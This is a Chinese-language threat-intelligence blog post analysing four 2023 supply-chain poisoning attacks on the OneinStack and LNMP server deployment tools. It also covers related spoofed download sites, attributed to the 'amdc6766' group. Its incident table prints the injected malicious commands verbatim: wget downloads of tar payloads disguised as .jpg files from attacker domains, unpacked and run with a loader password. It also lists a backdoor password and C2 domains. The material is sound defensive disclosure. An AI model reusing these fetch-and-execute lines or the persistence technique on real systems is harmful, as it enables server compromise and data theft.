一年四起供应链投毒事件的幕后黑手_oneinstack被黑

本文链接：https://blog.youkuaiyun.com/logic1001/article/details/145910340

前言

2017年，黑客入侵Avast服务器，在CCleaner更新中植入恶意代码，被数百万用户下载。

2017年，M.E.Doc遭黑客攻击，篡改更新植入NotPetya，影响全球公司。

2020年，黑客入侵SolarWinds服务器，植入恶意代码影响客户敏感信息，导致美国财政部、商务部等多个政府机构用户受到长期入侵和监视。

…

以上事件，均由黑客发起的供应链攻击引发。

供应链投毒攻击是指黑客利用供应链中的软件、硬件或服务等环节，通过植入恶意代码或篡改产品，从而影响最终用户的安全的一种攻击手段。当今世界依赖于数字网络连接，个人和企业都通过网络进行交流。攻击者可以通过攻击目标公司使用的第三方服务提供商，利用其服务或软硬件作为入口点进入目标网络。然后，通过供应链将风险扩大到其他企业和用户，造成巨大的影响。

概述

2023年4月，深信服安全运营中心（MSS）安服应急响应团队和深信服深瞻情报实验室发现了一起供应链投毒攻击事件，目标是PHP/JAVA部署工具OneinStack。同月，深瞻情报实验室还发现LNMP供应链投毒事件，随后在9月和10月又发现两起供应链投毒事件，分别涉及LNMP和Oneinstack。根据该团伙常用C2服务器特征，高度怀疑这四起供应链投毒事件均出自一个黑产团伙之手。

经过关联分析，深信服深瞻情报实验室发现四起事件的TTPs存在高度一致性，且溯源分析发现该团伙使用了多个以amdc6766.net结尾的域名实施恶意活动，包括供应链投毒攻击以及动态链接库远控后门。

2023上半年至今，这个黑产组织利用多种攻击手段，包括仿冒页面（AMH、宝塔、Xshell、Navicat）、供应链投毒（LNMP、OneinStack）和公开web漏洞等，有针对性地对运维人员进行攻击。运维人员从仿冒页面或官方平台下载并执行含有恶意代码的部署工具，与攻击者C2服务器建立DNS隧道连接。

该黑产组织通过定向投毒运维部署工具供应链，长期远控低价值主机作为肉鸡，择机选择高价值目标进行深度控制。随后他们会下发Rootkit和代理工具，伺机从事各类黑产活动，给用户造成实际损失。

供应链投毒事件时间线

时间	软件名	被篡改的文件目录	植入恶意代码
2023年4月	OneinStack	oneinstack/include/openssl.sh	wget http://download.cnoneinstack.com/oneinstack.jpg -cO /var/local/oneinstack.jpg \ tar zxf /var/local/oneinstack.jpg -C /var/local/ cd /var/local/cron \ ./load linux@QWE
2023年4月	LNMP	lnmp2.0/include/init.sh	wget http://lnmp01.amdc6766.net/lnmp.jpg -cO /var/local/lnmp.jpg \ tar zxf /var/local/lnmp.jpg -C /var/local/ cd /var/local/cron \ ./load linux@QWE
2023年9月	LNMP	lnmp2.0/include/init.sh、lnmp.sh	../tools/lnmp.sh linhkkngf@QWE
2023年10月	OneinStack	/src/pcre-8.45.tar.gz/pcre-8.45/configure	wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg tar zxf /var/local/osk.jpg -C /var/local/ > /dev/null rm -f /var/local/osk.jpg /var/local/cron/load linhkkngf@QWE

4月OneinStack供应链投毒事件

2023年4月，PHP/JAVA部署工具OneinStack遭受供应链投毒攻击。攻击者在官方网站下载安装包中植入恶意链接，已发现境内用户受到感染。

在OneinStack官方网站的安装程序中，/usr/local/src/oneinstack/include/openssl.sh被攻击者植入恶意代码。当用户从恶意地址下载oneinstack.jpg后，该文件会解压并执行./cron目录下load。

在load执行后，首先会判断受害主机是否为RedHat服务器。然后，它会从download.cnoneinstack.com下载一系列恶意文件，包括t.jpg，s.jpg，install，cr.jpg，libaudit.so.2等，并将他们解压至/var/local/cron目录下。最后，利用crond实现持久化建立DNS隧道通信。

4月LNMP供应链投毒事件

2023年4月和9月期间，Linux服务器部署工具LNMP遭受了供应链投毒的攻击。此次事件使用了与上文类似的攻击手法，因此怀疑是同一伙攻击者所为。

在4月LNMP供应链投毒事件中，安装过程中从lnmp01.amdc6766.net下载了lnmp.jpg，解压并执行了包括ba、cr、libxml.2.so.2.9.2等恶意文件。

9月LNMP供应链投毒事件

9月同样出现了LNMP供应链投毒事件。攻击者在lnmp2.0/include/init.sh中植入了恶意代码，并在tools目录下植入恶意二进制程序lnmp.sh。

执行lnmp.sh后，首先判断受害主机是否为RedHat服务器，然后从download.lnmp.life下载后阶段cr.jpg、s.jpg、Install、libseaudit.so.2.4.6等恶意文件，并将它们解压到了/var/local/cron目录中。最后，通过crond实现持久建立DNS隧道通信。

10月OneinStack供应链投毒事件

2023年10月6日，Oneinstack官方镜像网站的最新安装包再次被投毒。这次投毒行为是通过植入恶意代码到oneinstack/src/pcre-8.45/configure文件实施的。攻击者从download.oneinstack.club下载了osk.jpg，解压并执行了./cron目录下load。

load执行后，首先判断受害主机是否为RedHat服务器，然后从download.oneinstack.club下载后阶段t.jpg，s.jpg，install，cr.jpg，libstdc++.so.2.0.0等恶意文件，并将它们解压至/var/local/cron。最后，通过crond实现持久建立DNS隧道通信。

四起事件，指向同一个幕后真凶！

2023年10月，深信服XDR监测到某用户主机crond被替换加载了/libxm2.so.2.9.2等远控后门，同时发现sshd程序的动态链接库劫持/lib64/linux-x86-64.so.2，记录了ssh密码并设置了后门密码360bss3200189。

随后的监控发现了异常DNS定时请求，怀疑主机上可能还存在其他的守护进程。通过对主机的调查，发现这些DNS请求是由Rootkit内核线程发起的。

攻击者可以通过这些DNS请求下发控制命令。例如获取系统版本信息、执行命令、获取文件、执行socks5代理工具等。

此次攻击事件的完整攻击流程，如下图：

通过此次攻击事件的分析，发现与上半年监测到的多起供应链投毒事件存在较高的TTPs相似性，原因如下：

1.攻击套件参数和伪装手段一致

本次攻击者最初攻击套件中的install和src.jpg，install执行命令参数为linux@QWE，使用jpg后缀作为tar包的伪装，其攻击手法与OneinStack供应链投毒事件中的初始攻击套件一致。

2.使用crond服务持久化和后门动态链接库

本次攻击者下发/usr/sbin/crond+/usr/lib/libxm2.so.2.9.2动态链接库劫持，作为远控后门，建立DNS隧道连接。

OneinStack供应链事件中后续下载的crond、libaudit.so.2等恶意文件，同样是利用crond服务动态链接库劫持，建立DNS隧道连接，进行持久化。

1703843569_658e96f16446c3fa93f56.png!small?1703843570273

3.相同的域名amdc6766.net和攻击手法

内网某台主机存在后门程序/usr/lib/libxm2.so.2.9.2，其外连域名为aliyun.amdc6766.net。

在4月份的LNMP供应链投毒事件中，LNMP的安装过程中，从恶意域名lnmp01.amdc6766.net下载了lnmp.jpg文件。随后，该文件被解压并执行了ba、cr、libxml.2.so.2.9.2等恶意文件。该事件中的域名结构、恶意文件命名结构、攻击手法与上述事件高度相似。

由此可以推断“amdc6766”团伙与这次异常定时DNS请求攻击事件高度相关。四起供应链投毒事件的核心攻击手法相同：

恶意文件伪装为jpg
加载器的参数相似linux@QWE或linhkkngf@QWE
install执行参数相同linux@QWE
利用crond服务实现持久化
执行crond程序加载恶意动态链接库
建立DNS隧道连接

不讲武德，仿冒网站后投毒

经过深信服深瞻情报实验室对可疑域名amdc6766.net的关联分析，获得以下子域名。据了解，该域名常用于供应链投毒攻击以及动态链接库远控后门，因此内部将该团伙命名为代号“amdc6766”黑产组织。

域名	攻击活动
yum.amdc6766.net	远控后门外连域名
aliyun.amdc6766.net	远控后门外连域名
long.amdc6766.net	远控后门外连域名
baidu.amdc6766.net	远控后门外连域名
microsoft.amdc6766.net	远控后门外连域名
xshell.amdc6766.net	xshell供应链投毒攻击
navicat.amdc6766.net	navicat供应链投毒攻击
navicat02.amdc6766.net	navicat供应链投毒攻击
download.amdc6766.net	xshell供应链投毒攻击
lnmp01.amdc6766.net	LNMP供应链投毒攻击

今年4月，监测发现可疑xiandazm.com域名仿冒AMH面板官网。

仿冒页面中的AMH面板部署脚本已被替换为恶意链接。该安装脚本中注入恶意代码从down.amh.jpg下载amh.jpg，提供linux@QWE执行load，后续阶段与供应链投毒攻击无异。

根据恶意文件和网空特征关联到多个仿冒运维部署工具的网站。

可疑域名	攻击活动	域名注册时间
xiandazm.com	AMH面板仿冒页面	2023-03-06 08:02:55
cqdtwxx.com	AMH面板仿冒页面	2016-12-23 07:45:26
linhunq.com	Navicat仿冒页面	2023-02-08 06:28:09
www.navicatcn.net	Navicat仿冒页面	2023-01-13 07:56:59
cnxshell.com	Xshell仿冒页面	2023-03-06 08:02:55
cnlnmp.com	LNMP仿冒页面	2023-01-09 09:32:48
bixwinner.cc	恶意Xshell下载地址	2023-03-25 08:01:25
biosoft.cc	恶意LNMP下载地址	2023-03-07 09:17:44
lightsoft.cc	恶意宝塔面板下载地址	2023-03-23 07:41:04
highthost.cc	恶意Xshell下载地址	2023-03-25 08:01:24
lukesoft.cc	恶意Navicat下载地址	2023-03-07 09:17:44
amhplus.cc	恶意AMH面板下载地址	2023-05-01 09:10:29
download.amh.tw	恶意AMH面板下载地址	/

“amdc6766”黑产组织长期以来一直利用仿冒页面、供应链投毒及公开web漏洞等攻击方式，针对运维人员常用软件Navicat、Xshell、LNMP、AMH、OneinStack、宝塔等开展定向攻击活动。经过前期潜伏发现高价值目标后，他们会采取持久化手段，例如植入动态链接库、Rootkit、恶意crond服务等，控制受感染的主机，伺机发起各类黑产攻击活动。

思考：如何防范供应链攻击

对于防范供应链攻击而言，难点在于，攻击者只需找到软件供应链的一个弱点，就能轻松入侵并造成危害。然而，防守方企业需要对整个供应链上下游进行全面的安全防护。由于供应链的复杂性，追溯和清除攻击痕迹都是十分困难的，而这对大多数企业来说既不可行又不现实。因此，企业的重点应该是进一步提升自身的安全防护能力和意识，即使上下游供应链遭到黑客入侵，也能确保自身数据的安全。

在此，我们提醒您：